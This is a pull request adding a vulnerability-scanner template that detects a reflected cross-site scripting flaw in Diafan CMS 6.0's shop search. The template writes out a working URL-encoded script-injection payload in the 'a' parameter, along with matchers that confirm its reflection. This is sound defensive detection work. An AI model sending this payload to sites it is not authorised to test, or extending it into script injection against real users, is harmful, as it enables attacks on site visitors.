### PR TITLE
Add Diafan CMS 6.0 Reflected XSS template

### DIFF
--- a/http/vulnerabilities/other/diafan-cms-xss.yaml
+++ b/http/vulnerabilities/other/diafan-cms-xss.yaml
@@ -1,0 +1,43 @@
+id: diafan-cms-xss
+
+info:
+  name: Diafan CMS 6.0 - Reflected Cross-Site Scripting
+  author: 0xr2r,jarvis-survives
+  severity: medium
+  description: |
+    Diafan CMS 6.0 contains a reflected cross-site scripting (XSS) vulnerability in the search functionality. An attacker can inject malicious scripts into the search field via the 'a' parameter, which are reflected in the response without proper sanitization.
+  impact: |
+    An attacker can execute arbitrary JavaScript in the context of a victim's browser session.
+  remediation: |
+    Update Diafan CMS to the latest version with proper input sanitization.
+  reference:
+    - https://packetstormsecurity.com/files/176891/Diafan-CMS-6.0-Cross-Site-Scripting.html
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: diafan
+    product: diafan_cms
+  tags: xss,diafan,reflected,cms
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&pr1=0&pr2=0'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script>'
+          - 'diafan'
+        condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information

- Diafan CMS 6.0 reflected XSS in shop search functionality via the a parameter
- Medium severity — script injection reflected without sanitization
- Based on template from @0xr2r in #13229 (credited as co-author), added proper matchers and metadata
- Closes #13229

### Template validation

- Matches both XSS payload reflection AND diafan presence to avoid false positives
- Verified against PacketStorm advisory